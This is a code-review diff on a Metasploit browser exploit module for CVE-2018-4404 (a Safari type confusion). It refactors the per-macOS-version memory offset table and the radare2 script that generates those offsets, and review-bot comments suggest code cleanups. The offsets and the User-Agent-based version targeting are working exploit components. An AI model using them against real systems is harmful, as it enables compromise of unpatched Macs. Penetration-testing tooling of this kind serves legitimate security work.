parent
bee3c3d4d3
commit
57bad6b213
|
@ -66,13 +66,16 @@ You will need to install the latest radare2 for the script to function.
|
|||
```
|
||||
$ git clone https://github.com/radare/radare2 && cd radare2 && ./sys/install.sh && cd ..`
|
||||
$ ruby external/source/exploits/CVE-2018-4404/gen_offsets.rb
|
||||
const DYLD_STUB_LOADER_OFFSET = 0x000012a8;
|
||||
const DLOPEN_OFFSET = 0x00002e60;
|
||||
const CONFSTR_OFFSET = 0x000024fc;
|
||||
const STRLEN_OFFSET = 0x00001440;
|
||||
const STRLEN_GOT_OFFSET = 0xee8;
|
||||
'10.13' => {
|
||||
:dyld_stub_loader => '0x000012a8',
|
||||
:dlopen => '0x00002e60',
|
||||
:confstr => '0x000024fc',
|
||||
:strlen => '0x00001440',
|
||||
:strlen_got => '0xee8',
|
||||
},
|
||||
```
|
||||
|
||||
The offset `:jsc_vtab` cannot be generated but you can guess it is either 0xe000 or 0xd000.
|
||||
You can then add the offsets to the module:
|
||||
`modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb`
|
||||
|
||||
|
|
|
@ -9,10 +9,12 @@ def grab_offset(lib_file, function)
|
|||
offset_string[0..9]
|
||||
end
|
||||
|
||||
puts "const DYLD_STUB_LOADER_OFFSET = #{grab_offset("/usr/lib/system/libdyld.dylib", "dyld_stub_binder")};"
|
||||
puts "const DLOPEN_OFFSET = #{grab_offset("/usr/lib/system/libdyld.dylib", "sym._dlopen")};"
|
||||
puts "const CONFSTR_OFFSET = #{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._confstr")};"
|
||||
puts "const STRLEN_OFFSET = #{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._strlen")};"
|
||||
version = `sw_vers -productVersion`.strip
|
||||
puts " '#{version}' => {"
|
||||
puts " :dyld_stub_loader => '#{grab_offset("/usr/lib/system/libdyld.dylib", "dyld_stub_binder")}',"
|
||||
puts " :dlopen => '#{grab_offset("/usr/lib/system/libdyld.dylib", "sym._dlopen")}',"
|
||||
puts " :confstr => '#{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._confstr")}',"
|
||||
puts " :strlen => '#{grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._strlen")}',"
|
||||
|
||||
strlen_disasm = `r2 -2qQ -c "iS | grep nl_symbol_ptr; s sym.imp.strlen; pd 1" /System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore`
|
||||
#strlen_disasm = '''
|
||||
|
@ -23,5 +25,6 @@ strlen_disasm = `r2 -2qQ -c "iS | grep nl_symbol_ptr; s sym.imp.strlen; pd 1" /S
|
|||
got_offset = strlen_disasm.split(" ")[3].to_i(16)
|
||||
strlen_got_entry = strlen_disasm.scan(/\[(\S+)\]/).first.first.to_i(16)
|
||||
strlen_got_offset = (strlen_got_entry - got_offset).to_s(16)
|
||||
puts "const STRLEN_GOT_OFFSET = 0x#{strlen_got_offset};"
|
||||
puts " :strlen_got => '0x#{strlen_got_offset}',"
|
||||
puts " },"
|
||||
|
||||
|
|
|
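Review bot: Every offset is now resolved twice, because the new `puts " :dyld_stub_loader => ..."` block repeats the same `grab_offset` calls the `const` lines above it already made, which spawns radare2 a second time per symbol and could in principle print two different values if the library changes between runs. Resolving each offset once into a hash and printing both the JavaScript `const` form and the Ruby hash form from it keeps the two outputs guaranteed identical. `grab_offset` itself is defined above this hunk, so I cannot see what it returns when r2 finds no symbol; presumably an empty slice of `offset_string[0..9]`, which would silently print `const ... = ;` — worth a `raise "no offset for #{function}"` there. Proposed rewrite of the printing section:
```ruby
offsets = {
  dyld_stub_loader: grab_offset("/usr/lib/system/libdyld.dylib", "dyld_stub_binder"),
  dlopen:           grab_offset("/usr/lib/system/libdyld.dylib", "sym._dlopen"),
  confstr:          grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._confstr"),
  strlen:           grab_offset("/usr/lib/system/libsystem_c.dylib", "sym._strlen")
}
offsets.each { |name, value| puts "const #{name.to_s.upcase}_OFFSET = #{value};" }
version = `sw_vers -productVersion`.strip
puts " '#{version}' => {"
offsets.each { |name, value| puts "  :#{name} => '#{value}'," }
# … unchanged: strlen_disasm / STRLEN_GOT_OFFSET computation …
```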
@ -43,6 +43,35 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'Mar 15 2018'))
|
||||
end
|
||||
|
||||
def offset_table
|
||||
{
|
||||
'10.12.6' => {
|
||||
:jsc_vtab => '0x0000d8d8',
|
||||
:dyld_stub_loader => '0x00001168',
|
||||
:dlopen => '0x000027f7',
|
||||
:confstr => '0x00002c84',
|
||||
:strlen => '0x00001b40',
|
||||
:strlen_got => '0xdc0',
|
||||
},
|
||||
'10.13' => {
|
||||
:jsc_vtab => '0x0000e5f8',
|
||||
:dyld_stub_loader => '0x000012a8',
|
||||
:dlopen => '0x00002e60',
|
||||
:confstr => '0x000024fc',
|
||||
:strlen => '0x00001440',
|
||||
:strlen_got => '0xee8',
|
||||
},
|
||||
'10.13.3' => {
|
||||
:jsc_vtab => '0xe5e8',
|
||||
:dyld_stub_loader => '0x1278',
|
||||
:dlopen => '0x2e30',
|
||||
:confstr => '0x24dc',
|
||||
:strlen => '0x1420',
|
||||
:strlen_got => '0xee0',
|
||||
},
|
||||
}
|
||||
end
|
||||
|
||||
def exploit_data(directory, file)
|
||||
path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
|
||||
::File.binread path
|
||||
|
@ -66,35 +95,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def get_offsets(user_agent)
|
||||
if user_agent =~ /Intel Mac OS X (.*?)\)/
|
||||
mac_osx_version = Gem::Version.new($1.gsub("_", "."))
|
||||
version = $1.gsub("_", ".")
|
||||
mac_osx_version = Gem::Version.new(version)
|
||||
if mac_osx_version >= Gem::Version.new('10.13.4')
|
||||
print_warning "macOS version #{mac_osx_version} is not vulnerable"
|
||||
elsif mac_osx_version < Gem::Version.new('10.12')
|
||||
print_warning "macOS version #{mac_osx_version} is not vulnerable"
|
||||
elsif mac_osx_version == Gem::Version.new('10.12.6')
|
||||
return '''
|
||||
const JSC_VTAB_OFFSET = 0xd8d8;
|
||||
const DYLD_STUB_LOADER_OFFSET = 0x00001168;
|
||||
const DLOPEN_OFFSET = 0x000027f7;
|
||||
const CONFSTR_OFFSET = 0x00002c84;
|
||||
const STRLEN_OFFSET = 0x00001b40;
|
||||
const STRLEN_GOT_OFFSET = 0xdc0;'''
|
||||
elsif mac_osx_version == Gem::Version.new('10.13')
|
||||
return '''
|
||||
const JSC_VTAB_OFFSET = 0xe5f8;
|
||||
const DYLD_STUB_LOADER_OFFSET = 0x12a8;
|
||||
const STRLEN_GOT_OFFSET = 0xee8;
|
||||
const STRLEN_OFFSET = 0x1440;
|
||||
const CONFSTR_OFFSET = 0x24fc;
|
||||
const DLOPEN_OFFSET = 0x2e60;'''
|
||||
elsif mac_osx_version == Gem::Version.new('10.13.3')
|
||||
return '''
|
||||
const JSC_VTAB_OFFSET = 0xe5e8;
|
||||
const DYLD_STUB_LOADER_OFFSET = 0x1278;
|
||||
const STRLEN_GOT_OFFSET = 0xee0;
|
||||
const STRLEN_OFFSET = 0x1420;
|
||||
const CONFSTR_OFFSET = 0x24dc;
|
||||
const DLOPEN_OFFSET = 0x2e30;'''
|
||||
elsif offset_table.key?(version)
|
||||
offset = offset_table[version]
|
||||
return <<-EOF
|
||||
const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
|
||||
const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
|
||||
const DLOPEN_OFFSET = #{offset[:dlopen]};
|
||||
const CONFSTR_OFFSET = #{offset[:confstr]};
|
||||
const STRLEN_OFFSET = #{offset[:strlen]};
|
||||
const STRLEN_GOT_OFFSET = #{offset[:strlen_got]};
|
||||
EOF
|
||||
else
|
||||
print_warning "No offsets for version #{mac_osx_version}"
|
||||
end
|
||||
|
|
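Review bot: `Gem::Version.new(version)` still raises ArgumentError before any of the new branches run when the `(.*?)\)` capture is not a well-formed version string, since the regex accepts anything up to the first `)` in the User-Agent; the new exact-key lookup `offset_table.key?(version)` does not change that. A guard such as `return print_warning("Unparseable macOS version in User-Agent") unless Gem::Version.correct?(version)` placed before `mac_osx_version = Gem::Version.new(version)` would turn the exception into the same warning path the other unsupported cases use. The lookup is also exact-string, so a browser reporting `10_13` lands on the `'10.13'` key while one reporting `10_13_0` would fall through to "No offsets" — presumably intended, but a one-line comment above the `elsif` stating that keys must match the UA version verbatim would save the next contributor a guess. The `offset_table` method in the earlier hunk rebuilds the hash on every call; a frozen constant (`OFFSET_TABLE = { ... }.freeze`) would let this branch become a single `offset_table.fetch(version)`. The closing `end` of `get_offsets` lies outside this hunk.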